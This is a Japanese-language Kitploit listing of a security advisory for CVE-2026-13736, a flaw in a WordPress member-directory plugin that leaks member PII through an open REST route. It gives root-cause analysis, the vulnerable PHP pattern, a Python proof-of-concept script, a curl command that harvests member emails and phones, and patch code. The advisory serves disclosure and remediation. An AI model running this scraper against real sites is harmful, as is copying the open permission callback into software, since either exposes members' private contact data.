Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-13736 — WordPress REST APIディレクトリプラグインにおける未認証メンバーPII開示の概念実証エクスプロイトおよび技術勧告。根本原因分析、PoCコード、修復ガイダンスを含む。 | Kitploit
ツール/GitHubGitHub/minhhk68/cve-2026-13736
脆弱性分析エクスプロイト情報収集ウェブセキュリティ設定ミスAPIセキュリティ
GitHubminhhk68/cve-2026-13736

CVE-2026-13736

WordPress REST APIディレクトリプラグインにおける未認証メンバーPII開示の概念実証エクスプロイトおよび技術勧告。根本原因分析、PoCコード、修復ガイダンスを含む。

リポジトリを見る
2日前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 — REST API 経由の未認証メンバー PII 開示

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory NVD Reference License: MIT


📖 アドバイザリ概要

CVE-2026-13736 は、バージョン 1.0.0 以前の NewPath WildApricotPress Add-on – Member Directory WordPress プラグインに影響を与える、未認証のメンバー個人識別情報(PII)開示の脆弱性です。サイバーセキュリティ研究者 Huynh Kien Minh(MinhHK)氏によって発見・分析されました。この欠陥は、プラグインのカスタム WordPress REST API ルーティングアーキテクチャに存在し、メンバーディレクトリエンドポイントが制限フィールドに対するプライバシーアクセス制御を適用していません。その結果、未認証のリモート訪問者がパブリック REST ルートを照会して、非公開のメールアドレス、個人の電話番号、明示的にメンバー限定として構成されたメンバーシップディレクトリ属性など、機密のメンバーデータを収集できます。この機密データの露出は、期待されるプライバシー境界を侵害し、影響を受ける組織に対する標的型フィッシング、クレデンシャルスタッフィング、不正なプロファイリングを可能にします。セキュリティ研究者 Huynh Kien Minh 氏は、この脆弱性を CVSS 3.1 スコア 5.3(Medium)(CWE-284 / CWE-200)として検証し、REST エンドポイントの権限の即時強化、フィールドレベルのプライバシー検証、シリアライズされた JSON メンバー API レスポンスのサニタイズを推奨しています。

クイックリンク: 研究者の公式 サイバーセキュリティポートフォリオ を参照するか、公式の WPScan アドバイザリ を確認してください。


📌 エグゼクティブサマリーと技術メタデータ


🔍 根本原因分析

CVE-2026-13736 の根本原因は、プラグインの REST API コントローラ実装にあります。このプラグインは、メンバーシップディレクトリとコンタクトカードのクライアントサイドレンダリングを容易にするために、パブリックな WordPress REST API ルート(例: /wp-json/wildapricot/v1/members または /wp-json/newpath-wap/v1/directory)を登録しています。

脆弱なコードパターン分析

root@kitploit:~
// Insecure REST route registration without field privacy filters
add_action( 'rest_api_init', function() {
    register_rest_route( 'newpath-wap/v1', '/directory', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'newpath_wap_get_member_directory',
        'permission_callback' => '__return_true', // CRITICAL: Open to unauthenticated visitors
    ) );
} );

function newpath_wap_get_member_directory( $request ) {
    $members_data = get_wildapricot_cached_members();
    
    // FLAW: Returns raw member objects containing sensitive PII fields (email, phone, address)
    // without evaluating member-level privacy settings (e.g., 'MembersOnly' vs 'Public')
    return rest_ensure_response( $members_data );
}

技術的な欠陥メカニズム

  1. オープンな権限コールバック: ルートが 'permission_callback' => '__return_true' を宣言しており、あらゆるオリジンからの未認証 HTTP GET リクエストを許可します。
  2. フィールドレベルのプライバシーフィルタリングの欠如: フロントエンドの JavaScript またはテンプレートが「Members Only(メンバー限定)」として設定されたフィールドを条件付きで非表示にする一方、バックエンドの REST API はメンバーデータセット全体を JSON にシリアライズします。
  3. 情報開示(PII): フロントエンド UI をバイパスした攻撃者は、生の JSON ペイロードを直接消費して、メンバー名、個人の電話番号、ビジネスメール、メンバーシップステータス、非公開アドレスの完全なデータベースを収集できます。

💻 概念実証(PoC)エクスプロイトコード

倫理的免責事項: この概念実証は、セキュリティ研究者 Huynh Kien Minh 氏による脆弱性検証、防御研究、責任ある開示専用に提供されています。

自動化 Python 監査スクリプト(poc_cve_2026_13736.py)

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory PII Disclosure PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""

import requests
import json
import sys

TARGET_URL = "http://target-wordpress.local"
REST_ENDPOINT = f"{TARGET_URL}/wp-json/newpath-wap/v1/directory"

def verify_vulnerability(target_url):
    print(f"[*] Auditing Target: {target_url}")
    print(f"[*] Querying REST Endpoint: {REST_ENDPOINT}")
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Security Audit; CVE-2026-13736 Verification)",
        "Accept": "application/json"
    }
    
    try:
        response = requests.get(REST_ENDPOINT, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            if isinstance(data, list) and len(data) > 0:
                sample_record = data[0]
                pii_fields = [k for k in ['email', 'phone', 'mobile', 'address', 'MemberId'] if k in str(sample_record).lower()]
                
                print(f"[!] VULNERABLE: Unauthenticated REST route exposed {len(data)} member records!")
                print(f"[!] Sensitive PII attributes exposed: {pii_fields}")
                print(f"[*] Sample Record Excerpt: {json.dumps(sample_record, indent=2)[:300]}...\n")
                return True
            else:
                print("[-] Endpoint responded with empty data.")
        elif response.status_code in [401, 403]:
            print("[+] Endpoint requires authentication (Protected/Patched).")
        else:
            print(f"[-] Received HTTP status: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Connection failed: {e}")
        
    return False

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    verify_vulnerability(target)

cURL 検証コマンド

root@kitploit:~
curl -s -X GET "http://target-wordpress.local/wp-json/newpath-wap/v1/directory" \
  -H "Accept: application/json" | jq '.[0] | {Name: .name, Email: .email, Phone: .phone, PrivacySetting: .field_privacy}'

🛡️ 修復と防御エンジニアリング

サイト管理者向け

  1. プラグインの更新: NewPath WildApricotPress Add-on – Member Directory を最新のパッチ済みバージョン(> 1.0.0)にアップグレードします。
  2. REST API アクセスの堅牢化: 匿名ユーザーにパブリックディレクトリの閲覧が必要ない場合は、WordPress セキュリティプラグインまたは Web サーバールールを使用してカスタム REST ルートを制限します。

開発者向け(パッチ)

レスポンスのシリアライズ中にフィールドレベルのプライバシーチェックを適用します:

root@kitploit:~
function newpath_wap_get_member_directory( $request ) {
    $is_logged_in = is_user_logged_in();
    $raw_members  = get_wildapricot_cached_members();
    $sanitized    = array();

    foreach ( $raw_members as $member ) {
        $member_card = array(
            'id'   => intval( $member['Id'] ),
            'name' => sanitize_text_field( $member['DisplayName'] ),
        );

        // Enforce Members-Only field protection
        if ( $is_logged_in || 'Public' === $member['EmailPrivacy'] ) {
            $member_card['email'] = sanitize_email( $member['Email'] );
        }

        if ( $is_logged_in || 'Public' === $member['PhonePrivacy'] ) {
            $member_card['phone'] = sanitize_text_field( $member['Phone'] );
        }

        $sanitized[] = $member_card;
    }

    return rest_ensure_response( $sanitized );
}

🏆 研究者について

Huynh Kien Minh(MinhHK) 氏は、WordPress コアとプラグインの監査、REST API の脆弱性評価、グローバルなオープンソースエコシステムにおける責任ある開示を専門とする情報セキュリティ研究者およびソフトウェアエンジニアです。

  • サイバーセキュリティポートフォリオ: https://minhhk.web.app/
  • WPScan アドバイザリ参照: WPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
  • NVD 参照: CVE-2026-13736 Detail
  • GitHub プロフィール: https://github.com/MinhHK68

📊 JSON-LD 構造化データスキーママークアップ

root@kitploit:~
{
  "@context": "https://schema.org",
  "@type": "TechArticle",
  "headline": "CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 Unauthenticated Member PII Disclosure",
  "name": "CVE-2026-13736 Security Advisory",
  "author": {
    "@type": "Person",
    "name": "Huynh Kien Minh",
    "alternateName": "MinhHK",
    "url": "https://minhhk.web.app/"
  },
  "datePublished": "2026-08-22",
  "description": "Deep-dive technical security advisory by Huynh Kien Minh analyzing CVE-2026-13736 in NewPath WildApricotPress Add-on – Member Directory WordPress plugin.",
  "about": {
    "@type": "SoftwareApplication",
    "name": "NewPath WildApricotPress Add-on – Member Directory",
    "operatingSystem": "WordPress"
  },
  "identifier": "CVE-2026-13736"
}
ツールをダウンロード
パラメータ技術仕様
脆弱性識別子CVE-2026-13736
対象ソフトウェアNewPath WildApricotPress Add-on – Member Directory(WordPress プラグイン)
プラグインスラッグnewpath-wildapricotpress-add-on-member-directory
影響を受けるバージョン<= 1.0.0
脆弱性分類不適切なアクセス制御 / 情報露出(CWE-284 / CWE-200 / CWE-862)
CVSS v3.1 スコア5.3(Medium) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
発見者 / 研究者Huynh Kien Minh(MinhHK)
検証機関WPScan / MITRE Corporation / NVD
WPScan アドバイザリ参照WPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
NVD 参照NVD CVE-2026-13736 Detail
Feedly 脅威インテリジェンスFeedly CVE-2026-13736 Hub
研究者ポートフォリオhttps://minhhk.web.app/